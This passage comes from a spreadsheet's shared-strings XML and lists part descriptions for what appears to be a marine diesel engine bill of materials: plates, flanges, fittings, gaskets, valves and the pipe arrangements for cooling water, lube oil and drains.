    <t>Plate 100X50Xt19</t>
  </si>
  <si>
    <t>Plate 65X50Xt12</t>
  </si>
  <si>
    <t>Plate 90X100Xt12</t>
  </si>
  <si>
    <t>H100X100X6X8-461L</t>
  </si>
  <si>
    <t>C100X50X5X7.5-332.5L</t>
  </si>
  <si>
    <t>C75X40X5X7-411L</t>
  </si>
  <si>
    <t>C75X40X5X7-225.5L</t>
  </si>
  <si>
    <t>C75X40X5X7-137L</t>
  </si>
  <si>
    <t>Plate　100×50×t12</t>
  </si>
  <si>
    <t>10.9-Bolts M12×25</t>
  </si>
  <si>
    <t>Bolt M8×25</t>
  </si>
  <si>
    <t>Footplate arrangement lower support</t>
  </si>
  <si>
    <t>Footplate (Camshaft side)</t>
  </si>
  <si>
    <t>Round bar _x0001_φ16</t>
  </si>
  <si>
    <t>Pipe 20Ａ×966L</t>
  </si>
  <si>
    <t>Pipe 20Ａ×890L</t>
  </si>
  <si>
    <t>Round bar φ16×890L</t>
  </si>
  <si>
    <t>Round bar φ16×966L</t>
  </si>
  <si>
    <t>Pipe 15A×100L</t>
  </si>
  <si>
    <t>Bolt M12×70</t>
  </si>
  <si>
    <t>Ladder (Camshaft side)</t>
  </si>
  <si>
    <t>Plate 1188.5×50×t9</t>
  </si>
  <si>
    <t>Plate 90×100×t9</t>
  </si>
  <si>
    <t>Plate 90×65×t9</t>
  </si>
  <si>
    <t>Square bar 16×484</t>
  </si>
  <si>
    <t>Floor plate t4.5×1095×439.5</t>
  </si>
  <si>
    <t>Floor plate t4.5×1224×439.5</t>
  </si>
  <si>
    <t>Floor plate t4.5×762×439.5</t>
  </si>
  <si>
    <t>Plate　t6×65×1224</t>
  </si>
  <si>
    <t>Plate　t6×65×1280.2</t>
  </si>
  <si>
    <t>Plate　t6×65×1951.5</t>
  </si>
  <si>
    <t>Plate　t6×65×2603.7</t>
  </si>
  <si>
    <t>控制台扶手布置</t>
  </si>
  <si>
    <t>控制台支架</t>
  </si>
  <si>
    <t>沉头螺栓</t>
  </si>
  <si>
    <t>阻燃垫圈</t>
  </si>
  <si>
    <t>垫板</t>
  </si>
  <si>
    <t>工字钢</t>
  </si>
  <si>
    <t>扶手</t>
  </si>
  <si>
    <t>接头管</t>
  </si>
  <si>
    <t>禁区喷漆要求</t>
  </si>
  <si>
    <t>梯子</t>
  </si>
  <si>
    <t>方形帽</t>
  </si>
  <si>
    <t>Blind flange 5K-20</t>
  </si>
  <si>
    <t>Boss G3/8</t>
  </si>
  <si>
    <t>Boss M20×1.5</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-6×1/8</t>
  </si>
  <si>
    <t>Bite typr fitting LLM-UR-1/8×3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-U-6</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-3/8×3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-3/8×1/2</t>
  </si>
  <si>
    <t>Washer faced hexagon nut M10</t>
  </si>
  <si>
    <t>Hex. head bolt with wire hole M10 X 14</t>
  </si>
  <si>
    <t>Hexagon Head Bolts With Wire Hole M6×12</t>
  </si>
  <si>
    <t>Hexagon Head Bolts With Wire Hole M8×16</t>
  </si>
  <si>
    <t>10.9-Bolt M16 X 35</t>
  </si>
  <si>
    <t>10.9-Bolts M8x25</t>
  </si>
  <si>
    <t>10.9-Hexagon head bolt M12 X 25</t>
  </si>
  <si>
    <t>10.9-Bolts M20x60</t>
  </si>
  <si>
    <t>Flange 5K - 15A</t>
  </si>
  <si>
    <t>Flange 5K-15A</t>
  </si>
  <si>
    <t>Flange 5K - 25A</t>
  </si>
  <si>
    <t>Flange 5K - 25</t>
  </si>
  <si>
    <t>Flange 5K-32</t>
  </si>
  <si>
    <t>Flange 5K - 40A</t>
  </si>
  <si>
    <t>Flange 5K - 40</t>
  </si>
  <si>
    <t>Flange 5K - 50</t>
  </si>
  <si>
    <t>Flange 5K - 50A</t>
  </si>
  <si>
    <t>Flange 5K-65A</t>
  </si>
  <si>
    <t>Flange 5K-65</t>
  </si>
  <si>
    <t>Flange 5K - 100</t>
  </si>
  <si>
    <t>Flange　5K-150</t>
  </si>
  <si>
    <t>Flange　5K-150A</t>
  </si>
  <si>
    <t>Flange 10K-15</t>
  </si>
  <si>
    <t>Steel pipe socket welding flange 10K-32</t>
  </si>
  <si>
    <t>Flange 10K - 50</t>
  </si>
  <si>
    <t>Flange 10K-50A</t>
  </si>
  <si>
    <t>Blind flange 5K-25A</t>
  </si>
  <si>
    <t>Blind flange 5K-32A</t>
  </si>
  <si>
    <t>Blind flange 5K-25</t>
  </si>
  <si>
    <t>Blind flange 5K</t>
  </si>
  <si>
    <t>Blind flange 5K-40A</t>
  </si>
  <si>
    <t>Blind flange 5K-65A</t>
  </si>
  <si>
    <t>Blind flange 10K×32A</t>
  </si>
  <si>
    <t>Blind flange 10K-50A</t>
  </si>
  <si>
    <t>Boss A-type G1/2 x 25</t>
  </si>
  <si>
    <t>Boss A-type PF1/2 x 25</t>
  </si>
  <si>
    <t>Boss A-type　G1/2×25</t>
  </si>
  <si>
    <t>Boss A - type G 1/2 X 25</t>
  </si>
  <si>
    <t>Boss A-type G1/2x25L</t>
  </si>
  <si>
    <t>Boss A-type M20 x 1.5 x 20</t>
  </si>
  <si>
    <t>Boss　A-Type M20×1.5×20L</t>
  </si>
  <si>
    <t>Pipe end welding boss M20 X 1.5</t>
  </si>
  <si>
    <t>Elbow(short) 45°</t>
  </si>
  <si>
    <t>90°Elbow(S) 32A G.S</t>
  </si>
  <si>
    <t>Elbow (long) 90°25A GS</t>
  </si>
  <si>
    <t>Elbow (short) 90°25A GS</t>
  </si>
  <si>
    <t>90°Elbow (S) 32A S40</t>
  </si>
  <si>
    <t>90°Elbow (short) 50A GS</t>
  </si>
  <si>
    <t>Elbow (short) 90°65A GS</t>
  </si>
  <si>
    <t>Elbow(short) 90°</t>
  </si>
  <si>
    <t>90°Elbow (S) 150A GS</t>
  </si>
  <si>
    <t>Copper joint</t>
  </si>
  <si>
    <t>Pickup sensor E2E2-X5C1</t>
  </si>
  <si>
    <t>Plate 300x200xt16</t>
  </si>
  <si>
    <t>Plate 336.5x206xt16</t>
  </si>
  <si>
    <t>Plate 260x205xt16</t>
  </si>
  <si>
    <t>Rib 206x50xt9</t>
  </si>
  <si>
    <t>Rib 255x50xt9</t>
  </si>
  <si>
    <t>Plate 141.5x50xt9</t>
  </si>
  <si>
    <t>Pipe 15Ax90L</t>
  </si>
  <si>
    <t>Plate 50x600xt9</t>
  </si>
  <si>
    <t>L40x40x5-670</t>
  </si>
  <si>
    <t>Junction box type TB96D</t>
  </si>
  <si>
    <t>Load indicator</t>
  </si>
  <si>
    <t>E/S indicator box</t>
  </si>
  <si>
    <t>Transmitter for remote control system load indicator</t>
  </si>
  <si>
    <t>Protecting pipe assembly</t>
  </si>
  <si>
    <t>Pipe 50A x 3130mm</t>
  </si>
  <si>
    <t>Plate 360x175xt9</t>
  </si>
  <si>
    <t>Plate 124.5x65xt9</t>
  </si>
  <si>
    <t>Square pipe 75x45xt2.3</t>
  </si>
  <si>
    <t>Plate 115x40xt6</t>
  </si>
  <si>
    <t>L40x40x5-480</t>
  </si>
  <si>
    <t>L50x50x6-751</t>
  </si>
  <si>
    <t>L50x50x6-787</t>
  </si>
  <si>
    <t>L50x50x6-262</t>
  </si>
  <si>
    <t>L50x50x6-200</t>
  </si>
  <si>
    <t>Transmitter gear</t>
  </si>
  <si>
    <t>Trasmitter pinion</t>
  </si>
  <si>
    <t>Local indicator box arrangement for contorol system</t>
  </si>
  <si>
    <t>Angle steel L75x75x6-400</t>
  </si>
  <si>
    <t>Angle steel L50x50x6-338</t>
  </si>
  <si>
    <t>Angle steel L50x50x6-191</t>
  </si>
  <si>
    <t>Seal plate t12</t>
  </si>
  <si>
    <t>Seal plate t22</t>
  </si>
  <si>
    <t>Fitting base assembly</t>
  </si>
  <si>
    <t>Plate 298x50xt9</t>
  </si>
  <si>
    <t>L40x40x5-131L</t>
  </si>
  <si>
    <t>Plate 178x50xt9</t>
  </si>
  <si>
    <t>Plate 85x50xt19</t>
  </si>
  <si>
    <t>Arrangement of oil mist detector (for 6 cyl.)</t>
  </si>
  <si>
    <t>L40x40x5-628L</t>
  </si>
  <si>
    <t>L40x40x5-250L</t>
  </si>
  <si>
    <t>Standard of temperature gauge and sensor length</t>
  </si>
  <si>
    <t>Transmitter cover</t>
  </si>
  <si>
    <t>Plate 146x40xt3.2</t>
  </si>
  <si>
    <t>Plate 100x40xt3.2</t>
  </si>
  <si>
    <t>Cable rail arrangement</t>
  </si>
  <si>
    <t>Plate 85x30xt12</t>
  </si>
  <si>
    <t>Plate 138x45xt6</t>
  </si>
  <si>
    <t>Plate 80x45xt6</t>
  </si>
  <si>
    <t>Bearing wear monitoring sensor arrangement</t>
  </si>
  <si>
    <t>Wire Φ1.6x2500L</t>
  </si>
  <si>
    <t>Plate 350x220xt9</t>
  </si>
  <si>
    <t>Rib 55x55xt9</t>
  </si>
  <si>
    <t>L65X65X8-210L</t>
  </si>
  <si>
    <t>L50X50X6-400L</t>
  </si>
  <si>
    <t>L65X65X6-140L</t>
  </si>
  <si>
    <t>Bite type fitt.</t>
  </si>
  <si>
    <t>Plug with cable 5m</t>
  </si>
  <si>
    <t>Plug with cable 10m</t>
  </si>
  <si>
    <t>Both sides connector cable 3m</t>
  </si>
  <si>
    <t>Bearing wear monitoring sensor</t>
  </si>
  <si>
    <t>Cable connector</t>
  </si>
  <si>
    <t>Fastening equipment</t>
  </si>
  <si>
    <t>Water in oil sensor monitor</t>
  </si>
  <si>
    <t>Pressure switch (MBC5100)</t>
  </si>
  <si>
    <t>Pressure switch (RT112)</t>
  </si>
  <si>
    <t>Pressure transmitter (MBS5100)</t>
  </si>
  <si>
    <t>Controller (Flush mount type)</t>
  </si>
  <si>
    <t>Controller (Wall mount type)for oil mist detector UISION Ⅲ C</t>
  </si>
  <si>
    <t>Miniature valve RV-10</t>
  </si>
  <si>
    <t>Moniature valve RV-10</t>
  </si>
  <si>
    <t>Bite type fitting LLC-URF-10X3/8</t>
  </si>
  <si>
    <t>Bite type fitting LLC-UR-10X1/4</t>
  </si>
  <si>
    <t>Bite type fitting LLC - UR - 15 X 1/2</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-UR-15x1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-10X3/8</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UR- 1/2 X 1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM - UR - 1/2 X 1/2</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UR-1/2x1/2</t>
  </si>
  <si>
    <t>Bite type fitting (for steel pipe use) LLM-UR-1/2 x 3/4</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UR-1/2×3/4</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UR-1/2x3/4</t>
  </si>
  <si>
    <t>Bite type fitting LLM - UR - 3/4 X 1</t>
  </si>
  <si>
    <t>Bite type fitting LLC-T-10</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-U-6</t>
  </si>
  <si>
    <t>Bite type fitting LLC-U-10</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-U-10</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-U-15</t>
  </si>
  <si>
    <t>Bite type fitting LLM-U-10</t>
  </si>
  <si>
    <t>Bite type fitting LLM - U - 1/8</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-U-1/2</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-E-1/2</t>
  </si>
  <si>
    <t>Bite type pipe fitting 6A</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-1/2x1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM - UP - 1/2 X 1/2</t>
  </si>
  <si>
    <t>Bite type fitt. LLM-UP-1/2x1/2</t>
  </si>
  <si>
    <t>Bite type fitting LLM-UP-1/2X3/4</t>
  </si>
  <si>
    <t>Joint LLM-UP- 3/4 X 3/4</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-UM-10-M14x1.5</t>
  </si>
  <si>
    <t>Full face gasket 5K - 15A</t>
  </si>
  <si>
    <t>Gasket 5K-20</t>
  </si>
  <si>
    <t>Full-face gasket 5K-25A</t>
  </si>
  <si>
    <t>Full face gasket 5K - 25A</t>
  </si>
  <si>
    <t>Full face gasket 5K - 40A</t>
  </si>
  <si>
    <t>Full-face gasket 5K - 50</t>
  </si>
  <si>
    <t>Full-face gasket 5K-65A</t>
  </si>
  <si>
    <t>Full-face gasket 5K - 100</t>
  </si>
  <si>
    <t>Full-face gasket 5K - 150</t>
  </si>
  <si>
    <t>Full-face gasket 10K-32</t>
  </si>
  <si>
    <t>Full-face gasket 10K - 50</t>
  </si>
  <si>
    <t>Full-face gasket 10K-50A</t>
  </si>
  <si>
    <t>Gasket 9.5×14×0.5</t>
  </si>
  <si>
    <t>Copper gasket 14 X 18 X t1</t>
  </si>
  <si>
    <t>Copper gasket 14.5 X 19.5 X t1</t>
  </si>
  <si>
    <t>Gasket 17×21×1</t>
  </si>
  <si>
    <t>Copper gasket 17 X 21 X t1</t>
  </si>
  <si>
    <t>Copper gasket 20.5 x 26 x t1</t>
  </si>
  <si>
    <t>Copper gasket　φ20.5×φ26×t1</t>
  </si>
  <si>
    <t>Gasket 21×32×1</t>
  </si>
  <si>
    <t>Copper gasket 21.5 X 26 X t1</t>
  </si>
  <si>
    <t>Copper gasket 22.5 X 30 X t1</t>
  </si>
  <si>
    <t>Copper gasket 22.5x30xt1</t>
  </si>
  <si>
    <t>Copper gasket 25 x 34 x t1</t>
  </si>
  <si>
    <t>Copper gasket　φ25×φ34×t1</t>
  </si>
  <si>
    <t>Copper gasket 27×32×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket 27x37x1</t>
  </si>
  <si>
    <t>Copper gasket 27x37xt1</t>
  </si>
  <si>
    <t>Copper gasket 33.5 X 40 X t1</t>
  </si>
  <si>
    <t>Copper gasket 33.5×40×ｔ1</t>
  </si>
  <si>
    <t>Copper gasket 34 x 43.5 x t1</t>
  </si>
  <si>
    <t xml:space="preserve">Square gasket 5K-32 </t>
  </si>
  <si>
    <t>Gasket 5K-40 78 x PCφ75 x t1.5</t>
  </si>
  <si>
    <t>Ring gasket 16K-15</t>
  </si>
  <si>
    <t>Lock type glove valve 16K-15</t>
  </si>
  <si>
    <t>Screwed cock 16K-6A A-S</t>
  </si>
  <si>
    <t>Cock 16K-6</t>
  </si>
  <si>
    <t>Bronze 16k/cm2 screwed cooks</t>
  </si>
  <si>
    <t>Lock type glove valve 5K-20</t>
  </si>
  <si>
    <t>Glove valve 5K-25A</t>
  </si>
  <si>
    <t>Lock type glove valve 5K-25</t>
  </si>
  <si>
    <t>Valve 20K-10</t>
  </si>
  <si>
    <t>Plug M22x1.5</t>
  </si>
  <si>
    <t>Plug M24 X 2</t>
  </si>
  <si>
    <t xml:space="preserve">Boss M24 x 2 x 55L </t>
  </si>
  <si>
    <t>Boss M24 X 2 X 80L</t>
  </si>
  <si>
    <t>Boss M22x1.5x36L</t>
  </si>
  <si>
    <t>Tension washer M8</t>
  </si>
  <si>
    <t>Tension washer M10</t>
  </si>
  <si>
    <t>Tension washer M24</t>
  </si>
  <si>
    <t>Pipe support B-type 15Ax1</t>
  </si>
  <si>
    <t>Pipe support A type</t>
  </si>
  <si>
    <t>Elbow fitting 40K - 20</t>
  </si>
  <si>
    <t>Three way ball valve 20A</t>
  </si>
  <si>
    <t>600 Type screwed ball valve Rc 1/2</t>
  </si>
  <si>
    <t>Lock type screwed glove valve 40K-10</t>
  </si>
  <si>
    <t>Full-Face Gaskets 5K-65A</t>
  </si>
  <si>
    <t>400 type screwed ball valve Rc1/2</t>
  </si>
  <si>
    <t>Ever mount EA4001</t>
  </si>
  <si>
    <t>Ever-mount</t>
  </si>
  <si>
    <t>Ever mount EA4006</t>
  </si>
  <si>
    <t>Retainer plate pressure gauge pipe</t>
  </si>
  <si>
    <t>Pressure gauge (glycerin input) (φ75)</t>
  </si>
  <si>
    <t>Pipe support φ15x1</t>
  </si>
  <si>
    <t>600 type ball valve (with B cock)</t>
  </si>
  <si>
    <t>Pipe support fitting φ10</t>
  </si>
  <si>
    <t>Pipe support φ10 X 1</t>
  </si>
  <si>
    <t>Pipe support φ10x1</t>
  </si>
  <si>
    <t>Pipe support Plate</t>
  </si>
  <si>
    <t>Ball valve 10K-32A</t>
  </si>
  <si>
    <t>Three way cock 5K-25A</t>
  </si>
  <si>
    <t>Hexagon head screw with dog poin M10x30</t>
  </si>
  <si>
    <t>BBS Ballvalve PT1/4</t>
  </si>
  <si>
    <t>Bite type fitt. LLC-T-10</t>
  </si>
  <si>
    <t>Dial type thermometer</t>
  </si>
  <si>
    <t>Boss Type-A　M24×2×25L</t>
  </si>
  <si>
    <t xml:space="preserve">Slip-on welding square flange 5K-25A </t>
  </si>
  <si>
    <t>Name plate (English)</t>
  </si>
  <si>
    <t>Main pipe of exh. valve air spring</t>
  </si>
  <si>
    <t>Pipe 50AxSch40x3828L</t>
  </si>
  <si>
    <t>10K-50 Special frange</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x508.2L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x358.9L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x740.8L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x437.9L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x332.4L</t>
  </si>
  <si>
    <t>Plate 90x60xt6</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x218.0L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x742.1L</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x162.2L</t>
  </si>
  <si>
    <t>Plate 80x50xt9</t>
  </si>
  <si>
    <t>Plate 80x90xt9</t>
  </si>
  <si>
    <t>L50X50X6-161L</t>
  </si>
  <si>
    <t>L40X40X5-220L</t>
  </si>
  <si>
    <t>600-type Ball valve</t>
  </si>
  <si>
    <t>Drain pipe of exh. valve air spring air throttle</t>
  </si>
  <si>
    <t>Screw type fitting</t>
  </si>
  <si>
    <t>Recovery pipe assembly Exh. valve air spring drain pipe</t>
  </si>
  <si>
    <t>Recovery pipe assembly</t>
  </si>
  <si>
    <t>Pipe 80AxSch40x378L</t>
  </si>
  <si>
    <t>Pipe 25AxSch40x19L</t>
  </si>
  <si>
    <t>Plate t12x66x200</t>
  </si>
  <si>
    <t>Plate φ89×ｔ16（G3/4）</t>
  </si>
  <si>
    <t>Special square flange</t>
  </si>
  <si>
    <t>Bite type fitt. LLA-UE-1/2x3/4</t>
  </si>
  <si>
    <t>Copper pipe φ6</t>
  </si>
  <si>
    <t>Copper pipe φ8</t>
  </si>
  <si>
    <t>Bite type pipe fitting</t>
  </si>
  <si>
    <t>Booster servo - moter</t>
  </si>
  <si>
    <t>Control air piping arrangement</t>
  </si>
  <si>
    <t>Pipe φ6xt1.0x5000L</t>
  </si>
  <si>
    <t>Pipe φ10xt1.2x5000L</t>
  </si>
  <si>
    <t>Pipe φ15xt1.6x5000L</t>
  </si>
  <si>
    <t>U - bolt</t>
  </si>
  <si>
    <t>Drain pipe of piston under side</t>
  </si>
  <si>
    <t>Pipe 32A X 3658L</t>
  </si>
  <si>
    <t>Pipe 32A X 75L</t>
  </si>
  <si>
    <t>Pipe 15A X 141.8L</t>
  </si>
  <si>
    <t>Pipe 15A X 151.8L</t>
  </si>
  <si>
    <t>Pipe 15A X 169.6L</t>
  </si>
  <si>
    <t>Pipe 20A X 144.1L</t>
  </si>
  <si>
    <t>Pipe 32A X 576.1L</t>
  </si>
  <si>
    <t>Drain main pipe of piston under side</t>
  </si>
  <si>
    <t>Pipe 65A X 1745.1L</t>
  </si>
  <si>
    <t>Pipe 32A X 1095.8L</t>
  </si>
  <si>
    <t>Pipe 32A X 145.9L</t>
  </si>
  <si>
    <t>Pipe 32A X 56.9L</t>
  </si>
  <si>
    <t>L50 X 50 X 6 X 89L</t>
  </si>
  <si>
    <t>Plate 90 X 60 X t9</t>
  </si>
  <si>
    <t>L50 X 50 X 6 X 110L</t>
  </si>
  <si>
    <t>Drain branch pipe for piston rod stuffing box</t>
  </si>
  <si>
    <t>Wire φ2 X 200L</t>
  </si>
  <si>
    <t>Pipe 15A X 400.9L</t>
  </si>
  <si>
    <t>One way rectangular joint</t>
  </si>
  <si>
    <t>Bolt of elbow union (G1/2)</t>
  </si>
  <si>
    <t>H100 X 100 X 6 / 8 X 413.4L</t>
  </si>
  <si>
    <t>Plate 170 X 100 X t16</t>
  </si>
  <si>
    <t>Plate 100 X 88 X t6</t>
  </si>
  <si>
    <t>Cylinder lub.oil</t>
  </si>
  <si>
    <t>Pipe 10A×191.5L</t>
  </si>
  <si>
    <t>Pipe 10A×121L</t>
  </si>
  <si>
    <t>Pipe 10A×112L</t>
  </si>
  <si>
    <t>Pipe 6A×about 1255L</t>
  </si>
  <si>
    <t>Pipe 6A×about 550L</t>
  </si>
  <si>
    <t>Pipe 20A×974L</t>
  </si>
  <si>
    <t>Support L40×40×5-230.5L</t>
  </si>
  <si>
    <t>L50×50×6-396L</t>
  </si>
  <si>
    <t>L50×50×6-186L</t>
  </si>
  <si>
    <t>Support 160.5×25×ｔ6</t>
  </si>
  <si>
    <t>Support 155.5×25×ｔ6</t>
  </si>
  <si>
    <t>Cylinder liner lubricating oil pipe arrangement(1/4～4/4）</t>
  </si>
  <si>
    <t>Non flow alarm</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 3400L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 4000L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 2000L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 2200L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 2800L</t>
  </si>
  <si>
    <t>L50×50×6-169L</t>
  </si>
  <si>
    <t>Plate 161×150×ｔ6</t>
  </si>
  <si>
    <t>Plate 65×45×ｔ9</t>
  </si>
  <si>
    <t>Plate 124×25×ｔ6</t>
  </si>
  <si>
    <t>Plate 16×12×ｔ4.5</t>
  </si>
  <si>
    <t>Plate 24×16×ｔ6</t>
  </si>
  <si>
    <t>Plate 48×16×ｔ6</t>
  </si>
  <si>
    <t>Plate 16×6×ｔ4.5</t>
  </si>
  <si>
    <t>Plate 28.5×16×ｔ6</t>
  </si>
  <si>
    <t>Plate 52.5×16×ｔ6</t>
  </si>
  <si>
    <t>Cylinder liner lubricating oil pipe arrangement</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 550L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 560L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 600L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 800L</t>
  </si>
  <si>
    <t>Pipe φ6×φ4-about 850L</t>
  </si>
  <si>
    <t>H100 X 100 X 6 / 8 X 150L</t>
  </si>
  <si>
    <t>L65×65×8×158L</t>
  </si>
  <si>
    <t>L65×65×8×319L</t>
  </si>
  <si>
    <t>Pipe 40A X 1212.5L</t>
  </si>
  <si>
    <t>Pipe 25A X 90.6L</t>
  </si>
  <si>
    <t>Pipe 40A X 1032L</t>
  </si>
  <si>
    <t>Pipe 40A X 145L</t>
  </si>
  <si>
    <t>Orifice 40A (φ10)</t>
  </si>
  <si>
    <t>Hose conection 10K-15A</t>
  </si>
  <si>
    <t>Flange type connection</t>
  </si>
  <si>
    <t>Outlet branch pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Outlet main pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Outlet rigging conn. pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Air vent pipe of out main pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>In.and out pipe of A/C cooling water</t>
  </si>
  <si>
    <t>Main pipe of fire extingushing steam(1/2～2/2）</t>
  </si>
  <si>
    <t>Scavenging air trunk drain pipe (Cylinder under side drain)</t>
  </si>
  <si>
    <t>Air vent and drain pipe of air cooler</t>
  </si>
  <si>
    <t>Inlet rigging conn. pipe</t>
  </si>
  <si>
    <t>Pipe 65A x 58.0L</t>
  </si>
  <si>
    <t>Pipe 65A x 400.5L</t>
  </si>
  <si>
    <t>Inlet main pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Pipe 65A x 3652.0L</t>
  </si>
  <si>
    <t>Pipe 25A x 66.4L</t>
  </si>
  <si>
    <t>Inlet pipe of A/C cooling water</t>
  </si>
  <si>
    <t>Pipe　150A×731.2L</t>
  </si>
  <si>
    <t>Pipe　150A×230.1L</t>
  </si>
  <si>
    <t>Outlet pipe of A/C cooling water</t>
  </si>
  <si>
    <t>Pipe　150A×545L</t>
  </si>
  <si>
    <t>Pipe　150A×68.3L</t>
  </si>
  <si>
    <t>Pipe 65A x 3693.0L</t>
  </si>
  <si>
    <t>Pipe 25A x 61.4L</t>
  </si>
  <si>
    <t xml:space="preserve">Outlet rigging conn. pipe </t>
  </si>
  <si>
    <t>Pipe 65A x 659.4L</t>
  </si>
  <si>
    <t>Pipe 65A x 73.1L</t>
  </si>
  <si>
    <t>Pipe 25A x 1352.0L</t>
  </si>
  <si>
    <t>Pipe 25A x 421.0L</t>
  </si>
  <si>
    <t>Angle steel L40x40x5x85.5L</t>
  </si>
  <si>
    <t>Drain pipe of air cooler</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 X 463.6L</t>
  </si>
  <si>
    <t>Air vent pipe of air cooler</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 X 836L</t>
  </si>
  <si>
    <t>Pipe 6A x Sch40 X 459.3L</t>
  </si>
  <si>
    <t>Pipe 15A x 1240.9L</t>
  </si>
  <si>
    <t>Pipe 15A x 447.8L</t>
  </si>
  <si>
    <t>Bite type fitting LLA - UE - 1/2 X 1/2</t>
  </si>
  <si>
    <t xml:space="preserve">Air vent pipe of out main pipe </t>
  </si>
  <si>
    <t>Pipe 32A x 3434L</t>
  </si>
  <si>
    <t>Pipe 20A x 50.9L</t>
  </si>
  <si>
    <t>Plate t4.5 x 25 x 39</t>
  </si>
  <si>
    <t>Pipe 15A x 76L</t>
  </si>
  <si>
    <t>Pipe 40A x 3552.0L</t>
  </si>
  <si>
    <t>Pipe 40A x 95.0L</t>
  </si>
  <si>
    <t>Pipe 25A x 84.0L</t>
  </si>
  <si>
    <t>Pipe 40A x 1753.9L</t>
  </si>
  <si>
    <t>Pipe 25A x 75.0L</t>
  </si>
  <si>
    <t>Pipe 40A x 856.0L</t>
  </si>
  <si>
    <t>Pipe 25A x 560.9L</t>
  </si>
  <si>
    <t>Pipe 15A x 994.4L</t>
  </si>
  <si>
    <t>Orifice (50A φ8)</t>
  </si>
  <si>
    <t>Water vent pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Pipe 25A x 3837.5L</t>
  </si>
  <si>
    <t>Pipe 15A x 42.9L</t>
  </si>
  <si>
    <t>Pipe 32A x 558.5L</t>
  </si>
  <si>
    <t>Plate 134 x 123 x t4.5</t>
  </si>
  <si>
    <t>Plate 269.7 x 173 x t2.5</t>
  </si>
  <si>
    <t>Pipe 25A x1006.7L</t>
  </si>
  <si>
    <t>Pipe 25A x 788.5L</t>
  </si>
  <si>
    <t>Water vent branch pipe of cyl. cooling water</t>
  </si>
  <si>
    <t>Pipe 15A x 424.2L</t>
  </si>
  <si>
    <t>Orifice (25A φ6)</t>
  </si>
  <si>
    <t>Pipe 100A x 209.6L</t>
  </si>
  <si>
    <t>Pipe 50A x 84.6L</t>
  </si>
  <si>
    <t>Pipe 50A x 116L</t>
  </si>
  <si>
    <t>Plate t4.5 X φ107</t>
  </si>
  <si>
    <t>Pipe 50A x 889L</t>
  </si>
  <si>
    <t>Pipe 50A x 298L</t>
  </si>
  <si>
    <t>Pipe 50A x 670.5L</t>
  </si>
  <si>
    <t>Pipe 50A x 1122.2L</t>
  </si>
  <si>
    <t>Pipe 50A x 1157.3L</t>
  </si>
  <si>
    <t>Pipe 50A x 64.5L</t>
  </si>
  <si>
    <t>Pipe 50A x 163.2L</t>
  </si>
  <si>
    <t>Pipe 50A x 22.7L</t>
  </si>
  <si>
    <t>Pipe 50A x 2823.8L</t>
  </si>
  <si>
    <t>Pipe 50A x 826.4L</t>
  </si>
  <si>
    <t>Pipe 50A x 391.8L</t>
  </si>
  <si>
    <t>Orifice (50A φ10)</t>
  </si>
  <si>
    <t>Main pipe of fire extingushing steam</t>
  </si>
  <si>
    <t>Pipe 32AxSch40x3503.2Ｌ</t>
  </si>
  <si>
    <t>Pipe 15AxSch40x161.4Ｌ</t>
  </si>
  <si>
    <t>Pipe 32AxSch40x56.7Ｌ</t>
  </si>
  <si>
    <t>Flange 5K</t>
  </si>
  <si>
    <t>Angle steel L65 X 65 X 6 X 124L</t>
  </si>
  <si>
    <t>Plate t12 X 134 X 80</t>
  </si>
  <si>
    <t>Plate t16 X 422.5 X 200</t>
  </si>
  <si>
    <t>Plate t9 X 270 X 60</t>
  </si>
  <si>
    <t>Plate t9 X 123 X 80</t>
  </si>
  <si>
    <t>Plate t9 X 123 X 45</t>
  </si>
  <si>
    <t>Angle steel L65 X 65 X 6 X 84L</t>
  </si>
  <si>
    <t>Plate t16 X 546 X 130</t>
  </si>
  <si>
    <t>Plate t9 X 174 X 140</t>
  </si>
  <si>
    <t>L50 X 50 5-180L</t>
  </si>
  <si>
    <t>L50 X 50 5-174L</t>
  </si>
  <si>
    <t>Pipe 25A x 1411.3L</t>
  </si>
  <si>
    <t>Pipe 25A x 94.4L</t>
  </si>
  <si>
    <t>Pipe 25A x 56.9L</t>
